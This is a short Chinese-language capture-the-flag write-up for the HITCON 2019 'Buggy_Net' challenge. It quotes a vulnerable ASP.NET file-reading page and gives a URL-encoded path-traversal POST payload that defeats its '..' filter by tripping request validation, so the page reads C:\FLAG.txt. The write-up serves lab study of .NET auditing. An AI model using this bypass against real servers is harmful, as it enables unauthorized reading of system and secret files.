> For the complete documentation index, see [llms.txt](https://peri0dctf.gitbook.io/buuojwp/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://peri0dctf.gitbook.io/buuojwp/wei-fen-lei/windows-hitcon-2019-buggy_net.md).

# \[Windows]\[HITCON 2019]Buggy\_Net

## \[Windows]\[HITCON 2019]Buggy\_Net

## 考点

* .Net审计

## wp

BUU上少给了flag位置：`C:\FLAG.txt`

题目给了源码

![](https://982381760-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FKaFsBybpMwWG2gp4TiAi%2Fuploads%2F8JYhNF0HxPPOsb2nh8Ir%2Fimage-20210126223627263.png?alt=media\&token=d71df5b1-ffff-4291-abcb-ed4c8ede94be)

比较关键的逻辑如下

```csharp
<%@ Page Language="C#" %>
<% 
	bool isBad = false;
    try {
        if ( Request.Form["filename"] != null ) {
            isBad = Request.Form["filename"].Contains("..") == true;
        }
    } catch (Exception ex) {
        
    } 

    try {
        if (!isBad) {
            Response.Write(System.IO.File.ReadAllText(@"C:\inetpub\wwwroot\" + Request.Form["filename"]));
        }
    } catch (Exception ex) {
    }
%>
```

首先`isBad`为`false`，如果POST的文件名包含`..`的话，`isBad`就会为`true`，就读不了文件了。

所以这里要bypass`..`去读取文件c

[https://balsn.tw/ctf\_writeup/20191012-hitconctfquals/#buggy-.net<br>](<https://balsn.tw/ctf_writeup/20191012-hitconctfquals/#buggy-.net&#xA;>)[https://www.sigflag.at/blog/2019/writeup-hitconctf2019-buggy-dot-net/](<https://www.sigflag.at/blog/2019/writeup-hitconctf2019-buggy-dot-net/&#xA;>)

payload

```
POST filename=%2E%2E%5C%2E%2E%5CFLAG.txt&o=%3Cx
```

HTTP头部加个 `Content-Type: application/x-www-form-urlencoded`

s
